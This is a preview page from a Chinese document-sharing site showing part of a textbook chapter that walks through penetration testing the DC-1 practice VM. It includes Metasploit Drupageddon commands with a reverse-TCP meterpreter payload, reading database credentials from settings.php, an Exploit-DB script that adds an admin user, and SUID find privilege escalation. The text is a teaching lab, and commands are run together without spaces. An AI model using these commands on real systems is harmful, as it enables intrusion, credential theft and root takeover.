第8章-8.1-DC-1靶机渗透测试实践_第1页
第8章-8.1-DC-1靶机渗透测试实践_第2页
第8章-8.1-DC-1靶机渗透测试实践_第3页
第8章-8.1-DC-1靶机渗透测试实践_第4页
第8章-8.1-DC-1靶机渗透测试实践_第5页
已阅读5页,还剩23页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

DC-1靶机渗透测试实践第8章为渗透测试综合实践,对综合的靶场环境进行黑盒渗透,获取服务器系统权限,需要结合前面课程所学习的内容包括信息收集、漏洞查找、漏洞利用、权限提升等,对综合渗透环境进行渗透测试实践,旨在帮助学者把前面所学习的知识进行融会贯通,学以致用。前言DC-1是一个专门构建的易受攻击的靶机,目标旨在通过渗透测试获取目标信息,拿到root权限。要成功完成这一挑战,需要Linux技能、熟悉Linux命令行以及使用基本渗透测试工具的经验。DC-1靶机的下载地址为:/dc/DC-1.zipDC-1靶机渗透测试实践渗透目标信息收集利用Metasploit进行漏洞探测Drupal框架漏洞利用权限提升信息收集使用arp-scan探测存活主机输入命令:arp-scan-l对存活主机进行探测信息收集使用Nmap探测开放端口在探测到存活主机后,进一步对存活主机进行渗透,那么就需要知道主机所提供的服务,此时需要对存活端口进行探测。信息收集服务及版本探测80端口对应的服务为HTTP服务,查看网页相关信息可以看到该网站使用CMS为Drupal,在网页界面和底部都能发现“Drupal”标签信息。Drupal简介Drupal是一个开源的内容管理系统(CMS)平台,它是用PHP写成的。主要用于构造提供多种功能和服务的动态网站,这些功能包括用户管理(UserAdministration)、发布工作流(PublishingWorkflow)、讨论、新闻聚合(NewsAggregation)、元数据(Metadata)操作和用于内容共享的XML发布。Drupal有一个优秀的模块化结构,提供了许多模块,包括短消息、个性化书签、网站管理、Blog、日记、电子商务、电子出版、留言簿、Job、网上电影院、论坛、投票等模块。并且Drupal模块的下载、安装、定制非常方便。渗透目标信息收集利用Metasploit进行漏洞探测Drupal框架漏洞利用权限提升漏洞探测通过Metasploit查找Drupal架构漏洞利用的脚本,在Kali终端中输入msfconsole,启动Metasploit,进一步搜索Drupal架构利用漏洞。在Metasploit中输入SearchDrupal,查找漏洞利用模块。在Matesploit中搜索到可利用模块后,对漏洞进行利用。例如,选择模块drupal_drupageddon漏洞探测渗透目标信息收集利用Metasploit进行漏洞探测Drupal框架漏洞利用权限提升模块drupal_drupageddon具体命令如下:useexploit/multi/http/drupal_drupageddonsetpayloadphp/meterpreter/reverse_tcpsetrhosts46exploit漏洞利用漏洞利用在利用成功后,Matesploit进入后渗透meterpreter模块,输入“shell”,获取普通shell。漏洞利用Drupal框架的配置文件路径为sites/default/files。进入配置文件路径后,输入pwd查看当前所处目录,确认为Drupal默认配置文件目录。漏洞利用Drupal框架的数据库账号密码可以在settings.php中查看到,输入“cat/var/www/sites/default/settings.php”,查看settings.php内容,获得了数据库账号和密码。漏洞利用输入“whoami”查看当前获取shell权限为www-data。漏洞利用建立一个更高权限的交互式shell来控制靶机输入命令:python-c'importpty;pty.spawn("/bin/bash")'来获取Python返回来的交互式shell,然后使用获取到的数据库用户密码连接数据库。漏洞利用接下来查看数据库,在drupaldb库中寻找用户表。最后在drupaldb库users表中发现admin用户,但是admin用户的密码是被加密过的。漏洞利用查看Drupal版本,输入“cat/var/www/includes/bootstrap.inc|grepVERSION”,确定Drupal版本为7.24。漏洞利用输入“searchsploitdrupal”查找drupal的利用代码。漏洞利用利用脚本增加一组用户名密码admin1/admin1,执行下述命令新增用户。命令如下:python2/usr/share/exploitdb/exploits/php/webapps/34992.py-t46/-uadmin1-padmin1漏洞利用成功添加用户后,即可使用用户名admin1,密码admin1登录Web页面。渗透目标信息收集利用Metasploit进行漏洞探测Drupal框架漏洞利用权限提升权限提升查找系统中具有suid设置的所有文件,输入“find/-perm-40002>/dev/null”进行查找。权限提升通过find方式进行提权,依次输入下述命令:touchvenusfind/-typef-namevenus-exec"whoami"\;find/-t

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论